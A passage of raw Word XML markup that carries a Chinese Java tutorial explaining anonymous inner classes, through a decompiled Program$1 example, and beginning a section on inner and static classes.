                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>初看上去，就好象在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>不提供接口实现的情况下，直接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>了一个接口实例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，对于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>C#er</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>来说，有一种尽毁三观的赶脚。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>还好这只是假象，观察</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>目录下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>输出，会发现有一个类似</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mn"/>
          <w:rFonts w:ascii="MathJax_Main" w:hAnsi="MathJax_Main"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mi"/>
          <w:rFonts w:ascii="MathJax_Math-italic" w:hAnsi="MathJax_Math-italic"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mo"/>
          <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>的文件，如果反编译观察一下，发现原来是编译器自动生成一个类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mi"/>
          <w:rFonts w:ascii="MathJax_Math-italic" w:hAnsi="MathJax_Math-italic"/>
          <w:color w:val="454545"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mjxassistivemathml"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>1.class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mjxassistivemathml"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>的文件，如果反编译观察一下，发现原来是编译器自动生成一个类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="mjxassistivemathml"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:noProof/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="191135" cy="191135"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="206" name="图片 7" descr="复制代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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复制代码">
                      <a:hlinkClick r:id="rId10" tooltip="&quot;复制代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="191135" cy="191135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>package</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> jimmy;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> contract.ISay;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> java.io.PrintStream;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Program$1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>implements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> ISay</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> sayHello()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">   {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">     System.out.println("Hello java!");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003339FC" w:rsidRDefault="003339FC" w:rsidP="003339FC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:noProof/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="191135" cy="191135"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="65" name="图片 8" descr="复制代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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复制代码">
                      <a:hlinkClick r:id="rId10" tooltip="&quot;复制代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="191135" cy="191135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004118D3" w:rsidRDefault="003339FC" w:rsidP="00BB7E76">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="107" w:beforeAutospacing="0" w:after="107" w:afterAutospacing="0"/>
        <w:ind w:firstLine="300"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>如果有些场合，只需要临时需要创建一个接口的实现类，上面的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>技巧</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>可以用来简化代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006C6678" w:rsidRPr="00A300DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004118D3" w:rsidRPr="006C6678" w:rsidRDefault="008C543E" w:rsidP="00796322">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.1.18.3</w:t>
      </w:r>
      <w:r w:rsidR="003A2E1A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008409BF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内部类与静态类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00117FF7" w:rsidRDefault="00D16ECE" w:rsidP="00117FF7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="3F5FBF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:color w:val="3F5FBF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>内部类分为两种情况：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D16ECE" w:rsidRDefault="00E56D4B" w:rsidP="00117FF7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="3F5FBF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:color w:val="3F5FBF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类内：常规</w:t>
      </w:r>
      <w:r w:rsidR="00D16ECE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:color w:val="3F5FBF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>内部类、静态内部类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C5D27" w:rsidRDefault="00D16ECE" w:rsidP="00117FF7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法内：局部内部类、匿名内部类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E776B6" w:rsidRDefault="00E776B6" w:rsidP="00117FF7"/>
    <w:p w:rsidR="00E776B6" w:rsidRDefault="001849D0" w:rsidP="00117FF7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E776B6">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>静态内部类也是定义在另一个类里面的类，只不过在类的前面多了一个关键字</w:t>
      </w:r>
      <w:r w:rsidR="00E776B6">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidR="00E776B6">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。静态内部类是不需要依赖于外部类的，这点和类的静态成员属性有点类似，</w:t>
      </w:r>
      <w:r w:rsidR="00E776B6" w:rsidRPr="009355C4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>并且它不能使用外部类的非</w:t>
      </w:r>
      <w:r w:rsidR="00E776B6" w:rsidRPr="009355C4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidR="00E776B6" w:rsidRPr="009355C4">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
